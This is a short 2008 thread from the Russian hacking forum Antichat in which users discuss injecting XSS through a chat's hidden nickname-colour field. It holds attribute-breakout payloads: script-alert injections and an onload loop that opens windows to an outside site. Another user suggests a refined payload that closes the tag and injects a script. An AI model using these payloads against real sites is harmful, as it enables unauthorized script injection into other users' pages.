Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Взлом чата через скрытое поле цвета? (https://forum.antichat.xyz/showthread.php?t=58947)

FluffY 17.01.2008 07:03

Взлом чата через скрытое поле цвета?
 
Возможно ли провести хсс?
Код:

<input type="hidden" name="nick_color" id="nick_color" value="777777">

Я редактирую value=""><script>alert()</script>
я сен у меня ничего не получится, в конце мешает ">
Пробую
Код:

value=""><body onload="javascript:for(;;)open('http://idiot.ru/')
И с этим тоже ничего не выходит. Почему? Тэг закрывается на ">, но не работает почему?
Если просто закрываю тег то к моему нику приклеивается
/;font-size:12px;">
Ещё один баг когда вствляю коментарий вместо цвета например <!--/weqr--!>, тостраница чата загружается до моего ника и дальше не отображается... почему?

Можно ли провести хсс?

bul.666 17.01.2008 07:37

попробуй так value='"><script>alert()</script><font style="'>

Цитата:

тостраница чата загружается до моего ника и дальше не отображается... почему?
Коменты ставяться так:
<!---Комент--->
а не
<!---Комент---!>


Время: 09:03